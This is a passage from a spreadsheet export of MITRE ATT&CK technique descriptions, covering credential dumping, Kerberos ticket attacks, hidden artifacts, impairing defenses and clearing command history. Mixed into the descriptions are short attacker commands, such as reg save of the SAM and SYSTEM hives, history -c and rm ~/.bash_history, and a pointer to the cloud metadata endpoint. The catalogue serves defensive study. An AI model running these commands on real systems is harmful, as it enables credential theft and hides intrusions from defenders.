Alternatively, the SAM can be extracted from the Registry with Reg:
* &lt;code&gt;reg save HKLM\sam sam&lt;/code&gt;
* &lt;code&gt;reg save HKLM\system system&lt;/code&gt;
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
Notes: 
* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+.
</t>
  </si>
  <si>
    <t>T1558.004</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets: AS-REP Roasting</t>
  </si>
  <si>
    <t>Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) 
Preauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014)
For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) 
An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)
Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)</t>
  </si>
  <si>
    <t>T1558.001</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets: Golden Ticket</t>
  </si>
  <si>
    <t>Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection) 
Using a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)
The KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.</t>
  </si>
  <si>
    <t>T1558.002</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets: Silver Ticket</t>
  </si>
  <si>
    <t>Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
Silver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)
Password hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).</t>
  </si>
  <si>
    <t>T1552.008</t>
  </si>
  <si>
    <t>Unsecured Credentials: Chat Messages</t>
  </si>
  <si>
    <t>Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
Rather than accessing the stored chat logs (i.e., [Credentials In Files](https://attack.mitre.org/techniques/T1552/001)), adversaries may directly access credentials within these services on the user endpoint, through servers hosting the services, or through administrator portals for cloud hosted services. Adversaries may also compromise integration tools like Slack Workflows to automatically search through messages to extract user credentials. These credentials may then be abused to perform follow-on activities such as lateral movement or privilege escalation (Citation: Slack Security Risks).</t>
  </si>
  <si>
    <t>T1552.005</t>
  </si>
  <si>
    <t>Unsecured Credentials: Cloud Instance Metadata API</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)
If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows them to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)
The de facto standard across cloud service providers is to host the Instance Metadata API at &lt;code&gt;http[:]//169.254.169.254&lt;/code&gt;.
</t>
  </si>
  <si>
    <t>T1552.007</t>
  </si>
  <si>
    <t>Unsecured Credentials: Container API</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API)
An adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.(Citation: Unit 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such as via a pod's service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components. </t>
  </si>
  <si>
    <t>T1480.001</t>
  </si>
  <si>
    <t>Execution Guardrails: Environmental Keying</t>
  </si>
  <si>
    <t>Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)
Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.</t>
  </si>
  <si>
    <t>T1222.002</t>
  </si>
  <si>
    <t>File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: &lt;code&gt;chown&lt;/code&gt; (short for change owner), and &lt;code&gt;chmod&lt;/code&gt; (short for change mode).
Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques) </t>
  </si>
  <si>
    <t>T1222.001</t>
  </si>
  <si>
    <t>File and Directory Permissions Modification: Windows File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)
Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).</t>
  </si>
  <si>
    <t>T1564.008</t>
  </si>
  <si>
    <t>Hide Artifacts: Email Hiding Rules</t>
  </si>
  <si>
    <t>Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the &lt;code&gt;New-InboxRule&lt;/code&gt; or &lt;code&gt;Set-InboxRule&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.
Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as &lt;code&gt;malware&lt;/code&gt;, &lt;code&gt;suspicious&lt;/code&gt;, &lt;code&gt;phish&lt;/code&gt;, and &lt;code&gt;hack&lt;/code&gt;) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)
In some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).</t>
  </si>
  <si>
    <t>T1564.005</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden File System</t>
  </si>
  <si>
    <t>Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
Adversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)</t>
  </si>
  <si>
    <t>T1564.001</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden Files and Directories</t>
  </si>
  <si>
    <t>Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (&lt;code&gt;dir /a&lt;/code&gt; for Windows and &lt;code&gt;ls –a&lt;/code&gt; for Linux and macOS).
On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name  (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.
Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.
Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.</t>
  </si>
  <si>
    <t>T1564.002</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden Users</t>
  </si>
  <si>
    <t>Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users. 
In macOS, adversaries can create or modify a user to be hidden through manipulating plist files, folder attributes, and user attributes. To prevent a user from being shown on the login screen and in System Preferences, adversaries can set the userID to be under 500 and set the key value &lt;code&gt;Hide500Users&lt;/code&gt; to &lt;code&gt;TRUE&lt;/code&gt; in the &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; plist file.(Citation: Cybereason OSX Pirrit) Every user has a userID associated with it. When the &lt;code&gt;Hide500Users&lt;/code&gt; key value is set to &lt;code&gt;TRUE&lt;/code&gt;, users with a userID under 500 do not appear on the login screen and in System Preferences. Using the command line, adversaries can use the &lt;code&gt;dscl&lt;/code&gt; utility to create hidden user accounts by setting the &lt;code&gt;IsHidden&lt;/code&gt; attribute to &lt;code&gt;1&lt;/code&gt;. Adversaries can also hide a user’s home folder by changing the &lt;code&gt;chflags&lt;/code&gt; to hidden.(Citation: Apple Support Hide a User Account) 
Adversaries may similarly hide user accounts in Windows. Adversaries can set the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList&lt;/code&gt; Registry key value to &lt;code&gt;0&lt;/code&gt; for a specific user to prevent that user from being listed on the logon screen.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)
On Linux systems, adversaries may hide user accounts from the login screen, also referred to as the greeter. The method an adversary may use depends on which Display Manager the distribution is currently using. For example, on an Ubuntu system using the GNOME Display Manger (GDM), accounts may be hidden from the greeter using the &lt;code&gt;gsettings&lt;/code&gt; command (ex: &lt;code&gt;sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true&lt;/code&gt;).(Citation: Hide GDM User Accounts) Display Managers are not anchored to specific distributions and may be changed by a user or adversary.</t>
  </si>
  <si>
    <t>T1564.003</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden Window</t>
  </si>
  <si>
    <t>Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. 
On Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is &lt;code&gt;powershell.exe -WindowStyle Hidden&lt;/code&gt;. (Citation: PowerShell About 2019)
Similarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be &lt;code&gt;apple.awt.UIElement&lt;/code&gt;, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.
Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)</t>
  </si>
  <si>
    <t>T1564.011</t>
  </si>
  <si>
    <t>Hide Artifacts: Ignore Process Interrupts</t>
  </si>
  <si>
    <t>Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals. Many operating systems use signals to deliver messages to control process behavior. Command interpreters often include specific commands/flags that ignore errors and other hangups, such as when the user of the active session logs off.(Citation: Linux Signal Man)  These interrupt signals may also be used by defensive tools and/or analysts to pause or terminate specified running processes. 
Adversaries may invoke processes using `nohup`, [PowerShell](https://attack.mitre.org/techniques/T1059/001) `-ErrorAction SilentlyContinue`, or similar commands that may be immune to hangups.(Citation: nohup Linux Man)(Citation: Microsoft PowerShell SilentlyContinue) This may enable malicious commands and malware to continue execution through system events that would otherwise terminate its execution, such as users logging off or the termination of its C2 network connection.
Hiding from process interrupt signals may allow malware to continue execution, but unlike [Trap](https://attack.mitre.org/techniques/T1546/005) this does not establish [Persistence](https://attack.mitre.org/tactics/TA0003) since the process will not be re-invoked once actually terminated.</t>
  </si>
  <si>
    <t>T1564.004</t>
  </si>
  <si>
    <t>Hide Artifacts: NTFS File Attributes</t>
  </si>
  <si>
    <t>Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)</t>
  </si>
  <si>
    <t>T1564.010</t>
  </si>
  <si>
    <t>Hide Artifacts: Process Argument Spoofing</t>
  </si>
  <si>
    <t>Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
Adversaries may manipulate a process PEB to evade defenses. For example, [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the [Native API](https://attack.mitre.org/techniques/T1106) &lt;code&gt;WriteProcessMemory()&lt;/code&gt; function) then resume process execution with malicious arguments.(Citation: Cobalt Strike Arguments 2019)(Citation: Xpn Argue Like Cobalt 2019)(Citation: Nviso Spoof Command Line 2020)
Adversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.(Citation: FireEye FiveHands April 2021)
This behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://attack.mitre.org/techniques/T1134/004)) to manipulate or further evade process-based detections.</t>
  </si>
  <si>
    <t>T1564.006</t>
  </si>
  <si>
    <t>Hide Artifacts: Run Virtual Instance</t>
  </si>
  <si>
    <t>Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>T1564.007</t>
  </si>
  <si>
    <t>Hide Artifacts: VBA Stomping</t>
  </si>
  <si>
    <t>Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
MS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a &lt;code&gt;PerformanceCache&lt;/code&gt; that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the &lt;code&gt;_VBA_PROJECT&lt;/code&gt; stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)
An adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the &lt;code&gt;_VBA_PROJECT&lt;/code&gt; stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)</t>
  </si>
  <si>
    <t>T1562.012</t>
  </si>
  <si>
    <t>Impair Defenses: Disable or Modify Linux Audit System</t>
  </si>
  <si>
    <t>Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules.
Often referred to as `auditd`, this is the name of the daemon used to write events to disk and is governed by the parameters set in the `audit.conf` configuration file. Two primary ways to configure the log generation rules are through the command line `auditctl` utility and the file `/etc/audit/audit.rules`,  containing a sequence of `auditctl` commands loaded at boot time.(Citation: Red Hat System Auditing)(Citation: IzyKnows auditd threat detection 2022)
With root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with `auditd` daemon or use `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files to ignore malicious activity.(Citation: Trustwave Honeypot SkidMap 2023)(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>T1562.010</t>
  </si>
  <si>
    <t>Impair Defenses: Downgrade Attack</t>
  </si>
  <si>
    <t>Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation. 
Adversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) or [Network Sniffing](https://attack.mitre.org/techniques/T1040).(Citation: Praetorian TLS Downgrade Attack 2014) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging)
Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade)</t>
  </si>
  <si>
    <t>T1562.011</t>
  </si>
  <si>
    <t>Impair Defenses: Spoof Security Alerting</t>
  </si>
  <si>
    <t>Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
Rather than or in addition to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), an adversary can spoof positive affirmations that security tools are continuing to function even after legitimate security tools have been disabled (e.g., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)). An adversary can also present a “healthy” system status even after infection. This can be abused to enable further malicious activity by delaying defender responses.
For example, adversaries may show a fake Windows Security GUI and tray icon with a “healthy” system status after Windows Defender and other system tools have been disabled.(Citation: BlackBasta)</t>
  </si>
  <si>
    <t>T1070.003</t>
  </si>
  <si>
    <t>Indicator Removal: Clear Command History</t>
  </si>
  <si>
    <t>In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable &lt;code&gt;HISTFILE&lt;/code&gt;. When a user logs off a system, this information is flushed to a file in the user's home directory called &lt;code&gt;~/.bash_history&lt;/code&gt;. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
Adversaries may delete their commands from these logs by manually clearing the history (&lt;code&gt;history -c&lt;/code&gt;) or deleting the bash history file &lt;code&gt;rm ~/.bash_history&lt;/code&gt;.  
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (&lt;code&gt;clear logging&lt;/code&gt; and/or &lt;code&gt;clear history&lt;/code&gt;).(Citation: US-CERT-TA18-106A)
On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the &lt;code&gt;PSReadLine&lt;/code&gt; module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
The &lt;code&gt;PSReadLine&lt;/code&gt; command history tracks the commands used in all PowerShell sessions and writes them to a file (&lt;code&gt;$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt&lt;/code&gt; by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
Adversaries may run the PowerShell command &lt;code&gt;Clear-History&lt;/code&gt; to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; file. Adversaries may also delete the &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)</t>
  </si>
  <si>
    <t>T1070.002</t>
  </si>
  <si>
    <t>Indicator Removal: Clear Linux or Mac System Logs</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the &lt;code&gt;/var/log/&lt;/code&gt; directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
* &lt;code&gt;/var/log/messages:&lt;/code&gt;: General and system-related messages
* &lt;code&gt;/var/log/secure&lt;/code&gt; or &lt;code&gt;/var/log/auth.log&lt;/code&gt;: Authentication logs
